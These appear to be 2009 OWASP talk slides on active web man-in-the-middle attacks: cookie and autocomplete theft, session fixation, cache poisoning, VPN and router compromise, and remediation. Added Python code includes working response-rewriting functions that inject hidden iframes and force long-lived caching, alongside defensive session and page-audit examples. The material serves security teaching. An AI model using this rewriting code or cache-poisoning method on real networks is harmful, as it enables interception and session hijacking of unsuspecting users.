IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Active Man in the Middle Attacks
The OWASP Foundation
OWASP
http://www.owasp.org
27/02/2009
Adi Sharabani
Security Research Group Manager, IBM Rational Application Security (a.k.a. Watchfire)
adish
Agenda
Background: Man in the Middle
– Network level: heavily researched
– Web application level: sporadic research
Outline
– Passive MitM attacks
– Active MitM attacks
– Penetrating an internal network
– Remediation
Man in the Middle Scenario
All laptop users connect to a public network
Wireless connection can easily be compromised or impersonated
Wired connections might also be compromised
Rules of Thumb – Don’ts …
Someone might be listening to the requests
– Don’t browse sensitive sites
– Don’t supply sensitive information
Someone might be altering the responses
– Don’t trust any information given on web sites
– Don’t execute downloaded code
Rules of Thumb – What Can You Do?
This leaves us with:
– Browse your favorite news site
– Browse your favorite weather site
(Diagram: non-sensitive sites are “boring”, sensitive sites are “interesting”; the rules above restrict the user to the boring ones)
You are still vulnerable
Mitigating a Fallacy
Fallacy: executing JavaScript on the victim == executing an attack
Reality: the same origin policy limits what injected script can reach. Turning script execution into an attack requires either
– JavaScript + a browser implementation bug, or
– JavaScript + execution on a specific (target) domain
– The latter is what XSS provides
Passive Man in the Middle Attacks
Victim browses to a website
Attacker views the request, manipulates it and forwards it to the server
Server returns a response
Attacker views the response, manipulates it and forwards it to the victim
Other servers are not affected
Active Man in the Middle Attack
The attacker actively directs the victim to an “interesting” site; the IFRAME could be invisible
Victim browses to a “boring” site (My Weather Channel)
Attacker transfers the request to the server
Server returns a response
Attacker adds an IFRAME referencing an “interesting” site (My Bank Site)
Automatic request sent to the interesting server
Other servers are not affected
Stealing Cookies*
Automatic request contains victim’s cookies
Obvious result: stealing cookies associated with any domain the attacker desires
Will also work for HttpOnly cookies (as opposed to XSS attacks): HttpOnly only hides a cookie from script, the browser still sends it in the clear-text request, where the network attacker reads it
* A similar attack was presented by Mike Perry – SideJacking
Demo
Overcoming Same Origin Policy
Victim surfs to a “boring” site
Attacker injects an IFRAME directing to an “interesting” site
Automatic request sent to the interesting server
Attacker forwards the automatic request to the “interesting” server
“Interesting” server returns a response
Attacker adds a malicious script to the response
Script executes with the “interesting” server’s restrictions, i.e. in that server’s origin, so the same origin policy no longer stands in the way
Result
– Attacker can execute scripts on any domain she desires
– Scripts can fully interact with any “interesting” website
Limitations
– Will only work for non-SSL web sites
Secure Connections – Login Mechanism
Secure Connections
Victim browses to site http://www.webmail.site
Site returns a response with a login form (Username / Password / SUBMIT)
Victim fills in login details (jsmith / ********) and submits the form
Login request is sent through a secure channel
Login successful: “Hello John Smith,”
Pre-login action sent in clear text: attacker could alter the pre-login response to make the login request be sent unencrypted
Stealing Auto Completion Information
Attacker redirects victim to a request to a pre-login page
Attacker returns the original login form together with a malicious script
Script accesses the auto-completion information using the DOM
* A passive version of this attack was described by RSnake in his blog
Result
– Attacker can steal any auto-completion information she desires
Limitations
– Will only work for pre-login pages that are not encrypted
– Will not work seamlessly in IE
Demo
Broadening the Attack (Time Dimension)
Passive MitM attacks: Present (“boring” sites)
Active MitM attacks: Past (“interesting” sites) and Future (“interesting” sites)
Session Fixation
Attacker redirects victim to the site of interest
Attacker returns a page with a cookie generated by the server
Cookie is saved on victim’s computer
A while later, victim connects to the site (with the pre-provided cookie)
Attacker uses the same cookie to connect to the server
Server authenticates attacker as victim
Result
– Attacker can set persistent cookies on victim
Limitations
– The vulnerability also lies within the server: the attack only works if the server keeps the pre-provided session identifier across login instead of issuing a fresh one
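The server-side condition that last limitation refers to, shown as an added Python example that is not code from the talk: a minimal in-memory session store with two login routines, one that records the authentication under whatever server-issued identifier the client presents (the pattern the attack needs) and one that issues a new identifier at login. The store, the names issue_session / login_vulnerable / login_hardened / whoami / run_scenario and the replayed flow are constructed for illustration.

```python
import secrets


def issue_session(store: dict) -> str:
    """Pre-login (anonymous) session as any visitor would receive one.
    In the attack the MitM obtains such an identifier by forwarding the
    victim's automatic request, then plants it in the victim's browser
    with a Set-Cookie header over plain HTTP (constructed flow)."""
    sid = secrets.token_urlsafe(32)
    store[sid] = {"user": None}
    return sid


def login_vulnerable(store: dict, presented_sid: str, user: str) -> str:
    """Vulnerable pattern: authentication is recorded under the identifier
    the client presented. It was issued by the server, so it passes any
    'did we issue this?' check, yet the attacker already knows it."""
    if presented_sid not in store:
        raise KeyError("unknown session")
    store[presented_sid]["user"] = user
    return presented_sid


def login_hardened(store: dict, presented_sid: str, user: str) -> str:
    """Hardened pattern: the pre-login identifier is discarded at the moment
    of authentication and the authenticated state is bound to a new one,
    so a planted identifier never becomes an authenticated one."""
    store.pop(presented_sid, None)
    new_sid = secrets.token_urlsafe(32)
    store[new_sid] = {"user": user}
    return new_sid


def whoami(store: dict, sid: str):
    """What the server believes about a request carrying `sid`."""
    session = store.get(sid)
    return session["user"] if session else None


def run_scenario(login) -> tuple:
    """Replay the slide's sequence against one login routine and return
    (victim's session id after login, user the attacker is authenticated
    as when replaying the planted id)."""
    store: dict = {}
    planted = issue_session(store)        # attacker obtains a server-issued id
    # ... and plants it in the victim's browser; a while later the victim logs in
    victim_sid = login(store, planted, "jsmith")
    return victim_sid, whoami(store, planted)   # attacker replays the planted id


if __name__ == "__main__":
    print("vulnerable:", run_scenario(login_vulnerable))
    print("hardened:  ", run_scenario(login_hardened))
```

Rotating the identifier at login is the defence that works regardless of how the attacker planted the cookie; rejecting unknown identifiers alone does not help here, because the planted value came from the server itself.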
Cache Poisoning
Attacker redirects victim to the site of interest
Attacker returns a malicious page with cache settings enabled
Page is cached on victim’s computer
A while later, victim visits the site and the browser serves the poisoned page from its cache
Result
– Attacker can poison any page she desires
– Poisoned pages will be persistent
Limitations
– Attacker can only poison non-SSL resources
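The two response manipulations behind the active MitM attack (the injected IFRAME) and the cache poisoning attack, as an added Python example that is not code from the talk. The functions take a raw, complete HTTP/1.1 response as an interceptor sees it on the wire and rewrite only what can be edited as plain bytes: a 200 text/html response with no Content-Encoding and no Transfer-Encoding, since a compressed or chunked body would have to be decoded first and Content-Length must be recomputed after the edit. The sample responses, the target URL http://bank.example/ and the function names are constructed for illustration.

```python
import email.utils
import time

# Constructed sample: a plain-HTTP "boring" page as the interceptor sees it.
SAMPLE_HTML_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Cache-Control: no-store, no-cache\r\n"
    b"Pragma: no-cache\r\n"
    b"Content-Length: 52\r\n"
    b"\r\n"
    b"<html><body><h1>Today: sunny, 22C</h1></body></html>"
)
# Constructed sample: a non-HTML response that must be left untouched.
SAMPLE_JSON_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: 12\r\n"
    b"\r\n"
    b'{"temp": 22}'
)


def parse_response(raw: bytes):
    """Split a raw response into (status line, [(name, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def get_header(headers, name):
    """First value of a header, matched case-insensitively, or None."""
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def build_response(status, headers, body: bytes) -> bytes:
    """Serialise, recomputing Content-Length so the browser reads the whole
    modified body instead of truncating it at the original length."""
    headers = [(n, v) for n, v in headers if n.lower() != "content-length"]
    headers.append(("Content-Length", str(len(body))))
    head = "\r\n".join([status] + [f"{n}: {v}" for n, v in headers])
    return head.encode("iso-8859-1") + b"\r\n\r\n" + body


def is_rewritable_html(status, headers) -> bool:
    """Only a 200 text/html body that is neither compressed nor chunked."""
    ok_status = status.split(" ")[1:2] == ["200"]
    ctype = (get_header(headers, "Content-Type") or "").lower()
    return (ok_status and ctype.startswith("text/html")
            and get_header(headers, "Content-Encoding") is None
            and get_header(headers, "Transfer-Encoding") is None)


def inject_iframe(raw: bytes, target_url: str) -> bytes:
    """Active MitM step: add an invisible IFRAME to the 'boring' page so the
    browser issues an automatic request, with its cookies, to target_url."""
    status, headers, body = parse_response(raw)
    if not is_rewritable_html(status, headers):
        return raw
    tag = (f'<iframe src="{target_url}" width="0" height="0" '
           f'style="display:none"></iframe>').encode("utf-8")
    at = body.lower().rfind(b"</body>")
    body = body + tag if at == -1 else body[:at] + tag + body[at:]
    return build_response(status, headers, body)


def make_persistent(raw: bytes, max_age: int = 365 * 24 * 3600) -> bytes:
    """Cache poisoning step: drop the server's anti-caching headers and give
    the (already modified) response a long freshness lifetime, so the browser
    keeps serving it from cache without going back to the network."""
    status, headers, body = parse_response(raw)
    drop = {"cache-control", "pragma", "expires"}
    headers = [(n, v) for n, v in headers if n.lower() not in drop]
    headers.append(("Cache-Control", f"public, max-age={max_age}"))
    headers.append(("Expires",
                    email.utils.formatdate(time.time() + max_age, usegmt=True)))
    return build_response(status, headers, body)


if __name__ == "__main__":
    poisoned = make_persistent(inject_iframe(SAMPLE_HTML_RESPONSE,
                                             "http://bank.example/"))
    print(poisoned.decode("iso-8859-1"))
```

Chaining the two functions is exactly the “future” variant: the injected content is served once over the public network and then replayed by the victim's own cache on every later visit, including from inside the corporate network.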
Demo
Complex Hacking: Virtual Private Networks
Virtual Private Networks (VPN)
VPN client initialization
– Create a secure network interface
– Set user’s routing table
VPN client finalization (upon exit or when connection is lost)
– Revert routing table
Do not confuse VPN and HTTPS architectures!
VPN Mixed Content
Victim surfs to a page in the VPN network (Internal Web Site):
<html> ... <script src="http://external/sc.js"></script> ... </html>
Attacker alters the non-encrypted script
Malicious script executes within the secure environment
Result
– VPN web sites are compromised
– User is not alerted to the security risk (as opposed to SSL mixed content issues)
Limitations
– Such mixed content is not widely used
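A check a site owner can run over their own pages for the two shapes described so far, the invisible cross-origin IFRAME of the active attack and an internal page loading an external script over plain HTTP: an added Python example, not code from the talk, using only the standard library. The sample page, the intranet host name and the rule labels are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _RefCollector(HTMLParser):
    """Collect the attributes of tags that load or frame other content."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "frame"):
            self.refs.append((tag, dict(attrs)))


def _origin(url: str):
    parts = urlsplit(url)
    return (parts.scheme, parts.hostname, parts.port)


def _looks_hidden(attrs: dict) -> bool:
    """Zero-sized or display:none / visibility:hidden, the usual invisible frame."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return attrs.get("width") in ("0", "0px") or attrs.get("height") in ("0", "0px")


def audit_page(page_url: str, html: str):
    """Return (rule, absolute_url) findings for `html` served at `page_url`.

    external-script           script loaded from another origin (the talk's
                              advice for internal sites: avoid it altogether)
    plain-http-script         that script additionally travels over plain HTTP,
                              so a MitM can rewrite it (the VPN mixed-content case)
    hidden-cross-origin-frame invisible frame pulling another origin into the
                              page, the shape of the injected IFRAME
    """
    collector = _RefCollector()
    collector.feed(html)
    page_origin = _origin(page_url)
    findings = []
    for tag, attrs in collector.refs:
        src = attrs.get("src")
        if not src:
            continue                      # inline script, or frame without source
        absolute = urljoin(page_url, src)
        if _origin(absolute) == page_origin:
            continue                      # same origin: not this check's concern
        if tag == "script":
            findings.append(("external-script", absolute))
            if urlsplit(absolute).scheme == "http":
                findings.append(("plain-http-script", absolute))
        elif _looks_hidden(attrs):
            findings.append(("hidden-cross-origin-frame", absolute))
    return findings


# Constructed sample: an intranet page reached over the VPN.
SAMPLE_PAGE_URL = "http://intranet.corp/portal/"
SAMPLE_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="http://external/sc.js"></script>
<script src="https://cdn.example/lib.js"></script>
</head><body>
<h1>Portal</h1>
<iframe src="/help/" width="300" height="200"></iframe>
<iframe src="http://bank.example/" width="0" height="0" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for rule, url in audit_page(SAMPLE_PAGE_URL, SAMPLE_PAGE):
        print(f"{rule:28} {url}")
```

Run it against pages fetched from inside the VPN (the only place they are reachable) and treat every plain-http-script finding on an internal site as the mixed-content case above: the script body is the one resource the network attacker can still rewrite.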
Hacking Non-Available Sites
Result
– Attacker can view and change any HTTP cache object, even for sites that are not reachable from the attacker’s network position (the cache on the victim’s machine is poisoned while the victim is on the public network and replayed later)
VPN Cache Injection
Attacker disconnects the connection to the VPN server
After the routing table is updated (reverted to the public network), attacker poisons the cache of an internal site
Attacker restores the connection
Attacker redirects victim to the cached resource
Cached resource loads and malicious cached script executes inside the VPN
Result
– VPN is great for the network level
– VPN is not enough for the application level
This attack could be applied to other application protocols!
Complex Hacking: Intranet Networks
Penetrating Internal Network – Simple Cache Poison
Result
– Attack will be launched every time victim accesses the resource
– The attack would be executed within the local intranet
Characteristics
– Firewall protections are helpless
– Affected servers will never know
– The attack is persistent
Setting Up a Future MitM Scenario
Using Active MitM techniques, attacker poisons victim’s cache related to his router’s web access
Victim’s router-related cache is poisoned with a malicious script
Malicious script is executed when victim tries to access the router (i.e. in the router’s origin, with the victim’s own router session)
Script configures router to tunnel future communication through attacker
Script hides the configuration changes
(Router settings shown in the slide: Outbound Proxy IP Address and Primary DNS Server Address set to 216.187.118.221)
Result
– Facilitates future MitM scenarios
– Does not require router’s credentials
– Fake settings could be displayed to the user
Limitations
– Requires victim to access router in the future
– Need to guess router’s address (e.g. 10.0.1.1)
Increasing the Exposure
Poison common home pages
– Script will execute every time victim opens his browser
Poison common scripts
– Script will execute on every page using the common script
– Example: http://www.google-analytics.com/ga.js
The “double active” attack
– Common poisoned page redirects to another poisoned resource
The Double Active Cache Poisoning Attack
Using Active MitM techniques, attacker poisons the common router’s address (e.g. 10.0.1.1)
Attacker also poisons common home pages
At a later time, victim opens browser
Cached home page is loaded and redirects victim’s browser to router’s web interface
Cached router’s web interface is loaded and malicious script changes router’s settings
Router is compromised by malicious script
Result
– Internal network has been compromised
Limitation
– Need to guess router IP and credentials
Active Attack Characteristics
– Not noticeable in user’s experience
– Not noticeable by any of the web sites
– IPS/IDS will not block it
– Can be persistent
– Can be used to hack into local organization
– Bypasses any firewall or VPN
– Can be used with DNS Pinning Techniques
– A problem with the current design
– Requires only one plain HTTP request to be transmitted
Remediation
Users
– Do not use auto-completion
– “Clean Slate Policy” (clear cache and cookies after using an untrusted network, so nothing planted there survives into the next session)
– Trust level separation
– Two different browsers / two different users / two different OS / virtualization products
– Tunnel communication through a secure proxy
– Might not be allowed in many hot-spots
Web owners
– Consider risks of partial SSL sites
– Do not consider a secure VPN connection as an SSL replacement
– Use random tokens for common scripts
– While considering performance issues
– Avoid referring to external scripts from internal sites
Industry
– Build an integrity mechanism for HTTP
– Secure WiFi networks
(Mechanisms later standardised in this direction are HTTP Strict Transport Security, which removes the plain-HTTP request the attack needs, and Subresource Integrity for scripts; neither existed when this talk was given.)
Summary
Active MitM attacks
– Broaden the scope of the passive attacks
– Design issues
– Dimension of time
– Past (steal cookies, auto-completion information, cache)
– Future (set up cookies, poison cache, poison form filler)
– Penetrating internal networks
– Persistent
– Bypass any current protection mechanisms
More information
– Paper and presentation will be uploaded to our blog: http://blog.watchfire.com
References
Watchfire’s Blog: http://blog.watchfire.com
Wireless Man in the Middle Attacks: http://www.informit.com/articles/article.aspx?p=353735&seqNum=7
SideJacking: http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html
More on SideJacking: http://erratasec.blogspot.com/2008/01/more-sidejacking.html
Active SideJacking: http://seclists.org/bugtraq/2007/Aug/0070.html
Surf Jacking: http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf
Stealing User Information: http://ha.ckers.org/blog/20060821/stealing-user-information-via-automatic-form-filling/
Thank you!